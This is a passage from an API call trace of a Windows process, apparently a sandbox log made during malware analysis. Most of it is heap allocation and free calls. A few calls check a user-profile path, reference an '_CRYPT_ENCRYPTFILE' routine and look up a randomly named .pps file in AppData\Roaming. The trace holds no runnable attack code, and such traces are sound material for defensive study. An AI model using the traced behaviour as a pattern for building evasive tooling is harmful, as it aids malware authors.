Flags=0x0, Size=0x4) returned 0x2e54bc8 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E2eFopJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2eFopJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eFopJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FopJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="opJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pJKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kn6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ustHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="stHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tHoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HoKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kg.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0228.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0228.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0228.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0228.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0228.304] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0228.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0228.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0228.305] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0228.305] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0228.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0228.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0228.306] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0228.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0228.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0228.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50470 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0228.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0228.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0228.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0228.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0228.307] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0228.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0228.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0228.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0228.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0228.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0228.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0228.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.311] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f940 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0228.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0228.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0228.312] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/E2eFopJKn6uustHoKg.pps", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda3b0440, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xf9871240, ftLastAccessTime.dwHighDateTime=0x1d5e7ea, ftLastWriteTime.dwLowDateTime=0xf9871240, ftLastWriteTime.dwHighDateTime=0x1d5e7ea, nFileSizeHigh=0x0, nFileSizeLow=0x7128, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="E2eFopJKn6uustHoKg.pps", cAlternateFileName="E2EFOP~1.PPS")) returned 0xa875d0 [0228.312] FindClose (in: hFindFile=0xa875d0 | out: hFindFile=0xa875d0) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0228.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0228.312] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0228.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0228.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0228.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0228.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0228.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0228.313] RtlAllocateHeap (HeapHandle=0x970000, 